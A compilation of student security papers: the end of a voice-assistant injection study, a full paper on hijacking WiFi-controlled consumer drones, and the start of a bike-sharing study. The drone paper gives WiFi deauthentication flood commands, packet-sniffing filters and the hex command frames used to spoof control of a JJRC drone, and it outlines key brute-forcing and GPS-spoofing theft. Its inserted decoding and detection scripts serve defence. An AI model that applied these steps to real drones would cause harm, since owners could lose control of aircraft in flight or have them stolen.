VCS whilst it is locked. Since the attack is most likely to take
place whilst the victim is not looking at his or her phone, users
should always lock their phones before putting them away.

Some VCSs like Google Assistant also offer customisable settings
that could bypass these restrictions. For example, the “Trusted
Voice” setting allows an attacker to execute a replay attack to
completely bypass any security mechanism on the phone. We
strongly recommend that this option should not be enabled.

VCS providers are also looking into additional security
mechanisms to prevent unauthorised use of VCSs. For example, S
Voice allows the user to customise the wake command from the
default “Hi Galaxy”. Apple has also started to develop this in
2017, and will be looking to incorporate custom commands into
Siri, along with the owner’s unique voice model, as a form of
voice biometric for authentication in the future [10].

This means that an attacker who does not know the victim’s
custom wake command will also not be able to activate the VCS.
However, such an approach is only security through obscurity,
and anyone who previously had knowledge of the custom wake
command (such as being in the vicinity while the victim uses the
wake command) will still be able to perform a replay attack.

Finally, some third-party mobile app vendors are also looking to
integrate their services into VCSs for greater convenience for
users. For example, the Oversea-Chinese Banking Corporation
(OCBC), a large financial institution within many markets in East
Asia, allows users to make fund transfers using voice commands
in Siri, integrated through its mobile application [16]. Considering
the high risk involved in exposing financial actions on the VCS,
users should also take caution before enabling such features on
their smartphone as well.

7. CONCLUSION
In this paper, we showed that it was indeed possible to inject
indiscernible voice commands into three of the most popular
smartphone VCSs (Google Assistant, Siri and S Voice), using
only entry-level audio equipment. This allows an attacker to take
over control of the device through various means, possibly
employing several types of attacks such as denial-of-service or
drive-by downloads.

With the widespread use of VCSs around the world not only in
smartphones, but also in smart home devices such as Amazon
Echo (Alexa) and Google Home (Google Voice), this
vulnerability may seem to be serious indeed.

However, the success rates of such attacks are largely dependent
on the surrounding background noise level, as well as whether the
victim’s phone is open to voice activation without his/her
knowledge in the first place.

Such attacks may be made more possible in the near future,
through the development of various voice synthesis tools and deep
learning techniques. It is best that greater awareness of such
vulnerabilities in VCSs is raised early, and users of VCSs
should employ the relevant security practices to prevent
unauthorised use of their smartphone through a combination of
passcodes, limiting voice activation, and/or customising their
VCS wake command, if possible.

8. ACKNOWLEDGEMENTS
We would like to show our appreciation to Professor Hugh
Anderson from the National University of Singapore for giving us
the opportunity to explore the given topic and for his valuable
insights and help throughout the course of this project.

9. REFERENCES
[1] Anon. 2016. Adobe Voco 'Photoshop-for-voice' causes
concern. BBC (November 2016). Retrieved November 16,
2017 from http://www.bbc.com/news/technology-37899902.
[2] Anon. 2017. Building an application with PocketSphinx.
CMUSphinx. Retrieved November 16, 2017 from
https://cmusphinx.github.io/wiki/tutorialpocketsphinx/.
[3] Conkie, A. Method and system for performing concatenative
speech synthesis using half-phonemes. Jan. 9, 2001.
[4] Diao, W., Liu, X., Zhou, Z. and Zhang, K. 2014. Your voice
assistant is mine: How to abuse speakers to steal information
and control your phone. In Proceedings of the 4th ACM
Workshop on Security and Privacy in Smartphones & Mobile
Devices (Scottsdale, USA, November 03 - 07, 2014).

CCS'14. ACM, New York, NY, 63-74. DOI=
http://dx.doi.org/10.1145/2666620.2666623.
[5] DSP Group. 2016. DBMD4 Part Number D4A1A. Data Brief.
Retrieved November 15, 2017 from
https://www.dspg.com/wp-content/uploads/DBMD4-Part-Number-D4A1A-Data-Brief-.pdf.
[6] iFixit. 2016. Samsung Galaxy S7 teardown. iFixit. Retrieved
November 15, 2017 from
https://www.ifixit.com/Teardown/Samsung+Galaxy+S7+Teardown/56686.
[7] Liu, C., Bendtsen, C., Johnson, M., McCarthy, A., Orozco,
O., Peart, M., Shum, S., Utreras, M. and Wang, H. 2015.
Worldwide Internet and mobile users. Retrieved November
15, 2017 from
https://insights.ap.org/uploads/images/eMarketer_Estimates_2015.pdf.
[8] Lyrebird. 2017. Lyrebird. Retrieved November 16, 2017
from https://lyrebird.ai/.
[9] Ofcom. 2017. Call charges and phone numbers. GOV.UK.
Retrieved November 15, 2017 from
https://www.gov.uk/call-charges.
[10] Purcher, J. 2017. Apple patent reveals a new security feature
coming to Siri. Patently Apple. Retrieved November 17,
2017 from
http://www.patentlyapple.com/patently-apple/2017/04/apple-patent-reveals-a-new-security-feature-coming-to-siri.html.
[11] Rabiner, L. 1989. A tutorial on hidden Markov models and
selected applications in speech recognition. Proceedings of
the IEEE. 77, 2 (Feb. 1989), 257–286. DOI=
https://doi.org/10.1109/5.18626.
[12] Roy, N., Hassanieh, H. and Choudhury, R. R. 2017.
BackDoor: Making microphones hear inaudible sounds. In
Proceedings of the 15th Annual International Conference on
Mobile Systems, Applications, and Services (Niagara Falls,
USA, June 23 - 23, 2017). MobiSys'17. ACM, New York,
NY, 2-14. DOI= https://doi.org/10.1145/3081333.3081366.
[13] Saito, Y., Takamichi, S. and Saruwatari, H. 2017. Statistical
parametric speech synthesis incorporating generative
adversarial networks. IEEE/ACM Transactions on Audio,
Speech, and Language Processing. PP, 99 (Oct. 2017), 1–1.
DOI= https://doi.org/10.1109/taslp.2017.2761547.
[14] Sak, H.C.F., Senior, A., Rao, K., Beaufays, F., and
Schalkwyk, J. 2015. Google voice search: faster and more
accurate. Google Research Blog. Retrieved November 16,
2017 from
https://research.googleblog.com/2015/09/google-voice-search-faster-and-more.html.
[15] Tamura, M., Mizutani, T., and Kagoshima, T. 2007. Fast
concatenative speech synthesis using pre-fused speech units
based on the plural unit selection and fusion method. IEICE
Transactions on Information and Systems. E90-D, 2 (Feb.
2007), 544–553. DOI=
https://doi.org/10.1093/ietisy/e90-d.2.544.
[16] Tham, I. 2017. OCBC SME customers can get Siri to
activate fund transfers, check balances. The Straits Times.
Retrieved November 17, 2017 from
http://www.straitstimes.com/singapore/ocbc-sme-customers-can-get-siri-to-activate-fund-transfers-balance-checks.
[17] van den Oord, A., Dieleman, S. and Zen, H. 2016. WaveNet:
a generative model for raw audio. Google Deepmind.
Retrieved November 16, 2017 from
https://deepmind.com/blog/wavenet-generative-model-raw-audio/.
[18] Zhang, G., Yan, C., Ji, X., Zhang, T., Zhang, T. and Xu, W.
2017. DolphinAttack: Inaudible voice commands. In
Proceedings of the 2017 ACM SIGSAC Conference on
Computer and Communications Security (Dallas, USA,
October 30 - November 03, 2017). CCS'17. ACM, New
York, NY, 103-117. DOI=
https://doi.org/10.1145/3133956.3134052.

Drone Hijacking

Lim Shunyong
National University of Singapore
21 Lower Kent Ridge Rd
Singapore 119077
+65 9088 7502
lim.shunyong@u.nus.edu

Ong Jing Yin
National University of Singapore
21 Lower Kent Ridge Rd
Singapore 119077
+65 9185 7827
ongjingyin@u.nus.edu

Priit Rinken
National University of Singapore
21 Lower Kent Ridge Rd
Singapore 119077
+65 8262 9811
e0216326@u.nus.edu

Shee Zhi Xiang
National University of Singapore
21 Lower Kent Ridge Rd
Singapore 119077
+65 9624 7327
a0124209@u.nus.edu

ABSTRACT
In this paper, we will be analysing the WiFi communications of
commercial drones and the security risks exposed by the
implementations. Our analysis is conducted via packet sniffing of
the communications between the drone and its client device.
Based on our findings for drones JJRC H37 Elfie and DJI Mavic
Pro, we will identify possible attacks that can be made.

Categories and Subject Descriptors
B.4.1 [Input/Output and Data Communications]: Data
Communication Devices.

General Terms
Experimentation. Security

Keywords
Drone, Quadcopter, WiFi Deauthentication, Packet Sniffing,
Unencrypted WiFi

1. INTRODUCTION
Drones, or unmanned aerial vehicles (UAVs), are miniature
aircraft that can be remotely controlled by pilots from the ground
or by following a pre-programmed mission. They have a multitude of
uses, from leisure flying by drone hobbyists to critical
reconnaissance missions by the military [1]. With the
technological advances in the recent years, drones have become
increasingly affordable. An average consumer can readily get hold
of a drone for under $100 [2]. US commercial drone use is
projected to expand tenfold by 2021 [3]. Furthermore, drones are
casually entrusted with more responsibilities lately. Amazon has
introduced Amazon Prime Air, a delivery system where Amazon
delivers customers’ packages using drones [4]. Likewise,
Alphabet is investing in drones for a similar service [5]. There is
no doubt that we are heading towards a future where drones will
be a routine sight in our daily lives.

With the growing role that drones are beginning to play around us,
there is a need for us to look at the security measures being taken
to ensure that the drone is not compromised. Various parties have
discovered methods to attack a number of commercial drones.
Whether it is a cheap $20 Parrot Bebop commercial drone
or an expensive Aerialtronics Altura Zenith Law Enforcement
Drone, attacks such as hijacking or GPS spoofing have been
successfully executed [6]. It is rather alarming how insecure some
of the drones can be. As drones increasingly gain popularity in the
mass consumer market, these insecurities in drones pose a real
threat, be it for the owners or people within the vicinity of the
drone. To demonstrate the security of consumer drones, we will
be identifying vulnerabilities of the DJI Mavic Pro and the JJRC
Elfie H37, as well as how these vulnerabilities can be exploited by
an attacker to hijack control of these drones.

2. SETUP
To facilitate our experiment, some equipment has to be prepared.
In this section, we will introduce the tools being used as well as
their usage.

Hardware used:
● 1x Laptop running Kali Linux 2017.1 release
● 1x WiFi adapter capable of packet injection (Mediatek
  RT3070)
● Raspberry Pi Zero with aircrack-ng installed

Figure 1. Hardware Setup

Software used:
● Python 2.7
● Airdrop-ng
● Airmon-ng
● Aircrack-ng
● Wireshark network protocol analyzer
● Tshark network protocol analyzer

We will be running our experiments using a Linux-based system.
In addition, a special kind of wireless network adapter is needed –
one that supports monitor mode and packet injection. By having
monitor mode, we are able to monitor all traffic received from a
wireless network without needing to link with an access point or
ad hoc network [7].

With the ability to perform packet injection, we will be able to
disrupt or intercept packets during the communication of two
parties. Having this type of network adapter is essential for us to
carry out our attacks.

For the actual attacks, one of the tools we will be using is
Aircrack-ng. Aircrack-ng is a network software suite with tools
meant to assess WiFi network security. It allows one to monitor
packets, execute various attacks such as replay attacks,
deauthentication and create fake access points, test WiFi cards and
driver capabilities and crack WEP and WPA/WPA2-PSK [8].

We will mainly be using the suite for monitoring packets and
replaying packets using tools such as airmon-ng, airodump-ng and
airdrop-ng.

For this attack we chose to run our attacks from a Raspberry Pi
Zero because it is very small and portable, meaning this
configuration could possibly be attached to a drone to approach
the target and it is also able to run a full-fledged Debian operating
system which allows it to run all the tools necessary for this
attack.

3. DRONE ANALYSIS
This section describes the drones that we were using for our
experimentation and the findings we derived based on the setup
we have done in section 2.

3.1 JJRC H37 Elfie

3.1.1 Background
The JJRC H37 Elfie has only one mode of operation, which is via
its Smartphone Application. The application can be used to
control the drone when the smartphone is connected to the drone’s
WiFi network. The typical use case of a JJRC H37 Elfie drone is
outlined below.
1. The user downloads and installs the JJRC RC App into
   their smartphone.
2. The user turns on the JJRC H37 Elfie drone.
3. The user connects the smartphone to the drone’s WiFi
   network, which has the format JJRC-xxxxxx SSID.
4. Once connected to the WiFi, the user will be able to
   navigate the drone using the app controls. The app
   streams live footage from the drone’s camera.

The drone’s WiFi network is not password protected, hence any
phone is capable of connecting to it. The JJRC RC App is freely
available for download in app stores.

During our experimentations, we discovered interesting behaviour
in the drone-client communications that are noteworthy. For the
scenario that two users connect to the drone concurrently, we refer
to the user who successfully connects first as the primary user,
and refer to the other user as the secondary user.
● When the primary user is controlling the drone, the
  secondary user can connect to the same WiFi network
  and view the camera footage stream via the app. The
  secondary user is unable to control the drone while the
  primary user has control over it.
● Once the primary user disconnects from the drone, the
  secondary user will be able to control the drone.

3.1.2 Command Packets
The drone’s static IP is set at 172.16.10.1. It has a number of ports
open for certain functionalities such as controls and video
streaming.

In this paper, our focus will be on port 8080, which is the port
which receives commands over UDP. Through our
experimentations, we determined that the command packets are of
frame length 102 bytes, and contain data of length 11 bytes.

The user navigates the drones via joystick controls on the phone
application, which means that there is a range of data commands
for navigating the drone in a single direction, depending on how
long of a distance the user pulls the joystick.

For simplicity, we decided to narrow down our set of data values
to contain only extreme directions, i.e. when the user pulls the
joystick to the far left / right / up / down.

The table below maps the command actions to the corresponding
data values that we retrieved. Byte values that carry significance
are underlined.

Table 1. List of frames corresponding to the drone’s
movement

Command          Data (hex)
Start up         ff 08 7e 3f 40 3f 90 10 10 40 cb
Emergency Stop   ff 08 7e 3f 40 3f 90 10 10 a0 6b
Up               ff 08 fc 3b 40 3f 90 10 10 00 91
Down             ff 08 00 40 40 3f 90 10 10 00 88
Move Forward     ff 08 7e 3f 01 43 90 10 10 00 46
Move Right       ff 08 84 7e 40 3f 90 10 10 00 c6
Move Left        ff 08 72 01 40 3f 90 10 10 00 55
Move Backwards   ff 08 7e 3f 7f 3d 90 10 10 00 ce
Rotate Right     ff 08 7e 3f 41 7e 90 10 10 00 cb
Rotate Left      ff 08 7e 3f 40 00 90 10 10 00 4a

3.2 DJI Mavic Pro

3.2.1 Background
The DJI Mavic Pro has two modes of operation: through the
Smartphone Application or Radio Controller. Due to time
constraints of this project, we will only look at control of the
drone via the Smartphone Application.

The Smartphone Application will control the drone using the
drone’s WiFi network. The typical use case of DJI Mavic Pro
using WiFi is outlined below.
1. Before turning on the Mavic, the user flips the Control
   Mode switch on the drone to the WiFi option.
2. The user turns on the aircraft and connects to the
   Mavic’s network, which has the format Mavic-xxxxxx.
   The password is on a QR code sticker pasted on the
   front right arm of the aircraft.
3. Once connected, the user opens the DJI Go app. The
   user will now be able to see settings and live view as
   normal. The user can also change SSID name and
   password if desired.
4. The user will be able to navigate the drone using the app
   controls. The app streams live footage from the drone’s
   camera.

The DJI Mavic Pro user guide discloses some interesting features
which are potentially useful for us.
● The drone’s WiFi network is password encrypted and
  follows WPA protocol. Drones come with a default
  password that contains 8 hexadecimal values.
● The drone has a failsafe procedure where it will return
  home if the app crashes or if the user loses WiFi
  connection. Home is where the drone thinks the user is.
● A lot of flight mode features are disabled and the range
  is significantly less on WiFi mode.

4. ANALYSIS PROCESS
In this section, we will explain the procedure we have taken to
analyze the data being transmitted to and from the drone. Since all
data is being transmitted through the JJRC WiFi network, we will
be mainly looking at the WiFi packets going through this network
using Wireshark and Tshark.

4.1 Capturing
When we ran Wireshark, we could see multiple TCP and UDP
packets to and from various ports on the drone. It mainly
consisted of three different types of packets.

Figure 2. Packet Sniffing with Wireshark

One of them is large UDP packets from port 4096 of the drone to
port 8888 of controller, which is presumably the video stream.
Another is 12 byte data TCP packets from source port 39005 of
the controller from the mobile application to the destination port
8888 of the drone.

Lastly, there are a number of 11 byte data UDP packets from
source port 45048 of the mobile application to destination port
8080 of the drone.

We noticed that the data in the 11 byte UDP packets tends to
remain constant until commands are given from the controller,
leading us to believe this is the port that is responsible for
receiving commands for the drone.

Now that we know what packets to look out for, we will
investigate further into the data of packets sent to this particular
port 8080. Since there is a lot of traffic between the drone and the
controller, Wireshark tends to get flooded with information,
making it difficult to keep track of the changes in the data packet.

In order to view the data contents easily, we used tshark and
filtered the data using the command

sudo tshark -I -f "port 8080" -f "dst net 172.16.10.1" -Y "frame.len==102" -T fields -e data

Figure 3. Packet Sniffing with Tshark

This allowed us to view packets with a frame length of 102 bytes
that were sent to the drone’s IP address on port 8080, which is the
port that receives commands. We filtered it further to display only
the data field, allowing us to easily note changes in the data when
different commands are given.

4.2 Analyzing
The first thing we noticed in the 11 byte data field is that the first
two bytes are always of value ff 08 and that the 7th-9th bytes are
always 90 10 10. Secondly, the last byte is repeated for
certain commands, leading us to believe the last byte is a
checksum.

The 3rd-4th bytes control movements up, down, left and right, with
the default value as 7e 3f. The 5th-6th bytes control the
movements forward, backward, rotate left and rotate right, with
the default value as 40 3f. Lastly, the 10th byte controls the start
and stop commands of the drone, with the default value as 00.

The table below summarises how each byte position corresponds
to each drone command.

Table 2. Frame Inspection

Byte Pos   1-2     3-4      5-6      7-9        10      11
Command    ff 08   Up       Fwd      90 10 10   Start   Checksum
                   Down     Back                Stop
                   Left     Rleft               Else:
                   Right    Rright              00
                   Else:    Else:
                   7e 3f    40 3f

Next, we looked into what is the content of each specific byte for
each specific command. What we found is summarised in the
table below.

Table 3. Summary of the Drone Command in hexadecimal

Command            Byte Position(s)   Byte(s)
Vertical Up        3-4                fc 3b
Vertical Down      3-4                00 40
Horizontal Left    3-4                72 01
Horizontal Right   3-4                84 7e
Move Forward       5-6                01 43
Move Backward      5-6                7f 3d
Rotate Left        5-6                40 00
Rotate Right       5-6                41 7e
Start              10                 40
Stop               10                 a0

By learning the way in which the command data is formatted, we
are now able to spoof packets to control the drone, allowing us to
execute malicious attacks such as denial of service and even
hijacking the drone.

5. ATTACK VECTORS
Based on the results in Section 4, we were able to perform two
types of attack which will be further elaborated in this section.

5.1 Denial of Service Attack
The Denial of Service attack was carried out by filtering out
SSIDs from the airodump report which match the known SSIDs
of the drone. In the scope of this project, we performed the
experiment with both “JJRC-XXXXX” and “Mavic-XXXXXX.”

We can assume that the standard SSID of the wireless network
created by the drone is publicly available for other manufacturers
as well. Information about the hardware addresses of these
networks was passed on to generate a filter settings file for
airdrop-ng.

Airdrop-ng, which is part of the aircrack-ng package, broadcasts
a large amount of deauthentication packets which disconnects the
controlling device from the drone and prevents reconnection for
as long as the deauthentication packets are being broadcast.

Our step by step approach to perform the denial of service attack
is described below.
1. The WiFi adaptor is first set to monitoring mode using
   the command airmon-ng start wlan0
2. We initiate Airodump on the WiFi adaptor to capture all
   the WiFi traffic into a file tempdata with the command
   airodump-ng -w tempdata wlan0mon
3. From the traffic captured, we identify our target drone
   and create an airdrop-ng settings file with a python script,
   which would deauthenticate all clients connected to the
   drone with the SSID of JJRC-XXXX.
4. We proceed to flood deauthentication requests via the
   WiFi adaptor with the command
   python /usr/src/aircrack/scripts/airdrop-ng/airdrop-ng -i wlan0mon -t tempdata-01.csv -r settings.txt
   The tempdata-01.csv file is the output of airodump-ng
   and settings.txt is the filter file created by the python
   script.
5. Within seconds, the user will lose control of the drone
   and is unable to send any more commands using the
   mobile application.

Figure 4. Deauthentication Request sent to the drone
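
As an added illustration (not code from the paper), the following decoder applies the byte layout of Tables 2 and 3 to payloads in the form printed by the tshark command in Section 4.1, for anyone reviewing captured traffic. The function names and the SAMPLE_CAPTURE lines are constructed for this example; the TABLE_1 values are copied from Table 1, and the last byte is recorded but not validated.

```python
"""Decode JJRC H37 command payloads (UDP port 8080) with the paper's byte layout."""
from collections import defaultdict
from typing import NamedTuple

HEADER = bytes.fromhex("ff08")      # bytes 1-2, constant (Table 2)
CONSTANT = bytes.fromhex("901010")  # bytes 7-9, constant (Table 2)

# Extreme joystick positions from Table 3; any other value is a partial deflection.
BYTES_3_4 = {"7e3f": "neutral", "fc3b": "vertical up", "0040": "vertical down",
             "7201": "horizontal left", "847e": "horizontal right"}
BYTES_5_6 = {"403f": "neutral", "0143": "move forward", "7f3d": "move backward",
             "4000": "rotate left", "417e": "rotate right"}
BYTE_10 = {0x00: "none", 0x40: "start", 0xA0: "stop"}

# The ten frames of Table 1, copied from the paper.
TABLE_1 = {
    "Start up": "ff087e3f403f90101040cb",
    "Emergency Stop": "ff087e3f403f901010a06b",
    "Up": "ff08fc3b403f9010100091",
    "Down": "ff080040403f9010100088",
    "Move Forward": "ff087e3f01439010100046",
    "Move Right": "ff08847e403f90101000c6",
    "Move Left": "ff087201403f9010100055",
    "Move Backwards": "ff087e3f7f3d90101000ce",
    "Rotate Right": "ff087e3f417e90101000cb",
    "Rotate Left": "ff087e3f4000901010004a",
}

# Constructed lines shaped like `tshark -T fields -e data` output (not a real capture).
SAMPLE_CAPTURE = [
    "ff087e3f403f90101040cb",            # Table 1 start frame
    "ff:08:fc:3b:40:3f:90:10:10:00:91",  # Table 1 "Up", colon-separated
    "ff08903f403f90101000f9",            # constructed partial deflection
    "ff087e3f403f9010",                  # truncated payload
    "aa087e3f403f90101040cb",            # wrong header
]


class FrameError(ValueError):
    """Payload does not match the 11-byte layout described in the paper."""


class Command(NamedTuple):
    bytes_3_4: str
    bytes_5_6: str
    byte_10: str
    last_byte: int  # suspected checksum: recorded here, not validated

    def label(self) -> str:
        """Name the active controls, or 'idle' when every field is at its default."""
        active = [part for part in (self.byte_10, self.bytes_3_4, self.bytes_5_6)
                  if part not in ("none", "neutral")]
        return " + ".join(active) if active else "idle"


def decode(hex_payload: str) -> Command:
    """Parse one hex payload; colon or space separators are tolerated."""
    cleaned = hex_payload.strip().replace(":", "").replace(" ", "")
    try:
        raw = bytes.fromhex(cleaned)
    except ValueError as exc:
        raise FrameError(f"not hex: {hex_payload!r}") from exc
    if len(raw) != 11:
        raise FrameError(f"expected 11 bytes, got {len(raw)}")
    if raw[:2] != HEADER or raw[6:9] != CONSTANT:
        raise FrameError("constant bytes 1-2 or 7-9 do not match")
    a, b = raw[2:4].hex(), raw[4:6].hex()
    return Command(
        BYTES_3_4.get(a, f"partial deflection ({a})"),
        BYTES_5_6.get(b, f"partial deflection ({b})"),
        BYTE_10.get(raw[9], f"unknown flag (0x{raw[9]:02x})"),
        raw[10],
    )


def summarize(lines):
    """Return (labels of decodable lines, [(line, reason)] for rejected lines)."""
    decoded, rejected = [], []
    for line in lines:
        try:
            decoded.append(decode(line).label())
        except FrameError as exc:
            rejected.append((line, str(exc)))
    return decoded, rejected


def shared_last_bytes(frames):
    """Group named frames by last byte; keep values used by more than one command."""
    groups = defaultdict(list)
    for name, payload in frames.items():
        groups[decode(payload).last_byte].append(name)
    return {value: names for value, names in groups.items() if len(names) > 1}


if __name__ == "__main__":
    decoded, rejected = summarize(SAMPLE_CAPTURE)
    print("decoded:", decoded)
    print("rejected:", rejected)
    print("repeated last bytes:", shared_last_bytes(TABLE_1))
```

Run over Table 1, shared_last_bytes reports the repetition noted in Section 4.2: the Start up and Rotate Right frames end in the same byte.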

5.2 Session Hijacking
The cheaper and simpler drones, as represented by the JJRC Elfie drone in our project, use an open Wi-Fi network for communicating with their control devices. Our observations indicate, though, that only the first client to connect to the network is given sole control of the drone.

The following clients are capable of only viewing the video stream. This means that after flooding deauthentication packets, our attack machine just needs to be the first to connect to the drone in order to gain full control of it.

This proved to be relatively simple as the attacking machine has a time advantage and can start connecting to the drone as soon as it stops sending the deauthentication packets, whereas the initial controlling smart devices implement a timeout between reconnection attempts.

When connection is established with the drone, we can control the drone by mapping the control commands sniffed with tshark earlier onto the keyboard. When the original controlling device is able to reconnect to the drone, it will be limited to only the camera view functionality, effectively losing control of the drone.

In order to regain control of the drone, it would have to launch a similar attack on its own.

Figure 5. User Interface of the hijacking controller

The more expensive and technologically advanced DJI Mavic Pro drone uses WPA2-PSK to secure its wireless network. The default key is an 8-character-long hexadecimal value which is unique to each machine.

This prevents a simple session overtaking, but alternative approaches which are not in the scope of this paper are possible. We identified two approaches to hijack the Wi-Fi control sessions of the DJI Mavic Pro.

We were able to capture the 4-way handshake between the controlling smart device and the DJI drone. The keyspace for the default passwords is 8 hexadecimal values, or 32 bits, which means that it is susceptible to a bruteforce attack in a reasonable amount of time.

The other attack vector we observed is that the default password is printed on the outside of the drone in both human- and machine-readable form (QR-code). This means that using appropriate optical hardware and our demo machine attached to a drone it is possible to take over the DJI drone in Wi-Fi mode when flying close enough to it.

6. DISCUSSIONS
In this section, we will describe the challenges that we faced and also how we can improve on our experiments if we had more time.

6.1 Limitations
In this project, due to the limited time we have with the DJI Mavic Pro, we were unable to explore any other attacks that the DJI Mavic Pro may be vulnerable to.

We managed only to perform a deauthentication attack on the DJI Mavic Pro and were unable to perform the session hijacking as it requires time for decrypting and analysing the packet transmitted between the drone and the user.

6.2 Future Work
One future expansion of the project will be to perform a brute force on the DJI Mavic Pro access point password and decrypt the packets transmitted between the user and the drone.

With the recent announcement of the KRACK attack on WPA2 [9], it is also possible to capture the 4-way WPA2 handshake, so the brute force attack can be done independently from the drone.

We would also like to experiment on the DJI Mavic Pro with GPS Spoofing. When the drone is disconnected from the user, its failsafe procedure is to return to the user. Since we have verified that deauthentication of the WiFi connection to the Mavic is doable, we can trigger the Mavic to return to the user. At the same time, we can spoof the GPS coordinates such that the drone would return to us instead of the user, proving an attack vector that allows attackers to steal expensive Mavic drones controlled over WiFi.

7. CONCLUSIONS
After analysis of the DJI Mavic Pro and the JJRC Elfie H37, we can see that commercial drones vulnerable to simple attacks exist on the market.

Although we were unable to hijack the more sophisticated DJI Mavic Pro, denial of service attacks through WiFi deauthentication were still possible. In terms of CIA, cheaper drones tend not to ensure confidentiality.

As we can see from the two drones, the DJI Mavic Pro uses WPA2-PSK to secure its wireless network, while the JJRC Elfie H37 does not even have a password for its open network. In both drones, we can see that integrity exists as the DJI Mavic Pro only allows a single connection to the drone at any point in time, while the JJRC Elfie H37 refuses commands from secondary users.

WiFi-controlled drones on the market still fail to enforce availability, allowing attackers to prevent victims from controlling their drones with WiFi deauthentication. Overall, it seems that most drones on the market were built without security considerations, having little to no security at all. More sophisticated drones do have more protection against most attacks with encrypted communications, but may still contain vulnerabilities.
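For monitoring, the pattern described in Section 5.2 (a burst of deauthentication frames followed by a different client winning the reconnection race) can be checked over captured management frames. The following is an added example, not code from the project; the `Frame` record, the thresholds and the MAC addresses are assumptions, and the sample capture is constructed.

```python
from collections import deque
from dataclasses import dataclass

@dataclass(frozen=True)
class Frame:
    ts: int      # capture time in milliseconds
    kind: str    # "assoc", "disassoc" or "deauth"
    bssid: str   # MAC of the drone's access point
    sta: str     # MAC of the client the frame concerns

def detect_takeover(frames, burst=20, window_ms=2000, race_ms=10000):
    """Flag deauthentication floods and a change of controlling client right after one.

    Model taken from the text: the first client to associate holds control and
    later clients are viewers. The thresholds are assumptions to tune per site.
    """
    recent = {}      # bssid -> timestamps of deauth frames inside the window
    controller = {}  # bssid -> client currently assumed to hold control
    flood = {}       # bssid -> (time of last flood frame, controller before it)
    alerts = []
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.kind == "deauth":
            q = recent.setdefault(f.bssid, deque())
            q.append(f.ts)
            while f.ts - q[0] > window_ms:
                q.popleft()
            if len(q) < burst:
                continue
            last = flood.get(f.bssid)
            if last is None or f.ts - last[0] > window_ms:
                # First frame over the threshold: a new flood starts here.
                alerts.append(("deauth_flood", f.bssid, f.ts))
                previous = controller.pop(f.bssid, None)
            else:
                previous = last[1]
            flood[f.bssid] = (f.ts, previous)
        elif f.kind == "disassoc":
            if controller.get(f.bssid) == f.sta:
                del controller[f.bssid]   # the controller left on its own
        elif f.kind == "assoc":
            if f.bssid in controller:
                continue                  # later clients are viewers only
            controller[f.bssid] = f.sta
            last = flood.get(f.bssid)
            if last and f.ts - last[0] <= race_ms and last[1] not in (None, f.sta):
                alerts.append(("controller_changed", f.bssid, f.ts, last[1], f.sta))
    return alerts

# Constructed addresses (locally administered range), not taken from the paper.
DRONE, PHONE, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:aa", "02:00:00:00:00:bb"

def sample_frames():
    """Constructed capture: phone in control, 40 deauth frames, another client associates first."""
    frames = [Frame(0, "assoc", DRONE, PHONE)]
    frames += [Frame(30000 + 20 * i, "deauth", DRONE, PHONE) for i in range(40)]
    frames += [Frame(31000, "assoc", DRONE, OTHER), Frame(33000, "assoc", DRONE, PHONE)]
    return frames

if __name__ == "__main__":
    for alert in detect_takeover(sample_frames()):
        print(alert)
```

A handful of deauthentication frames, as seen when a client leaves normally, stays below the burst threshold and raises nothing.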

8. ACKNOWLEDGMENTS
We would like to thank Professor Hugh Anderson for his patience and guidance in helping us with the project.

Next, we would also like to thank Professor Martin Henz for providing us with the DJI Mavic Pro for the experimentation.

Lastly, we would like to give credit to the user adria.junyent-ferre from hackaday.io who did a similar project with the JJRC Elfie drone, which provided us inspiration on how we can control the drone using our laptop.

9. REFERENCES
[1] Meier, C. (2015, February 03). A Brief Introduction to Drones. Retrieved November 01, 2017, from http://www.deaftv.co.za/brief-introduction-drones/
[2] Dronelli, V. (2017, October 23). The 20 Best Cheap Drones - [Fall 2017] Affordable Drones For Beginners. Retrieved November 01, 2017, from https://www.dronethusiast.com/cheap-drones-guide/
[3] Shepardson, D. (2017, March 22). U.S. commercial drone use to expand tenfold by 2021: government agency. Retrieved November 01, 2017, from https://www.reuters.com/article/us-usa-drones/u-s-commercial-drone-use-to-expand-tenfold-by-2021-government-agency-idUSKBN16S2NM
[4] Amazon Prime Air. (n.d.). Retrieved November 01, 2017, from https://www.amazon.com/Amazon-Prime-Air/b?node=8037720011
[5] Project Wing – X. (n.d.). Retrieved November 01, 2017, from https://x.company/projects/wing/
[6] Walters, S. (2016, October 29). How Can Drones Be Hacked? The updated list of vulnerable drones & attack tools. Retrieved November 01, 2017, from https://medium.com/@swalters/how-can-drones-be-hacked-the-updated-list-of-vulnerable-drones-attack-tools-dd2e006d6809
[7] November 02, 2017, from https://latesthackingnews.com/2017/07/19/what-is-monitor-mode-in-wifi/.
[8] Aircrack-ng. (2017). Retrieved from https://www.aircrack-ng.org/
[9] Vanhoef, M., & Piessens, F. (2017). Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2. Retrieved from https://papers.mathyvanhoef.com/ccs2017.pdf
[10] P. (2016, November 16). Flying the DJI Mavic Pro with Smartphone WIFI. Retrieved November 09, 2017, from https://www.rcgeeks.co.uk/blog/flying-dji-mavic-smartphone-wifi

Exploration of Weakness in Bike Sharing System

Tan Fengji
NUS School of Computing
13 Computing Drive
Singapore 117417
+65 8626 0290
a0129845@u.nus.edu

Tan Jian Sin
NUS School of Computing
13 Computing Drive
Singapore 11741
+65 9451 7087
e0003810@u.nus.edu

Tan Ngee Joel Jonas
NUS School of Computing
13 Computing Drive
Singapore 11741
+65 9178 7092
a0121298@u.nus.edu

Tan Wee Chen William
NUS School of Computing
13 Computing Drive
Singapore 11741
+65 8383 0049
a0121760@u.nus.edu

Tang Di Feng
NUS School of Computing
13 Computing Drive
Singapore 11741
+65 8366 6988
e0011840@u.nus.edu

ABSTRACT
Bike sharing systems benefitted many consumers by offering them greater flexibility in their choice of transport at a low cost. With the great value it brings to the lives of many people, it is no wonder that the number of users has been steadily increasing since its inception. As the number of users grows, the importance of ensuring system reliability and security grows as well.

Bike sharing companies often employ the use of IoT devices to secure their bicycles. As the concept of IoT is relatively new, security considerations for IoT devices and their systems tend to be inadequate.

In this paper, we explore the weaknesses of oBike’s bike sharing system. In addition, the paper also details several attacks that include, but are not limited to, allowing an attacker to update and change a bike’s location to the attacker’s will and granting unlimited usage of a bike without having to pay for it.

Categories and Subject Descriptors
K.6.5 [Security and Protection]: IOT Hacking, Secure implementation of protocols

General Terms
Design, Security

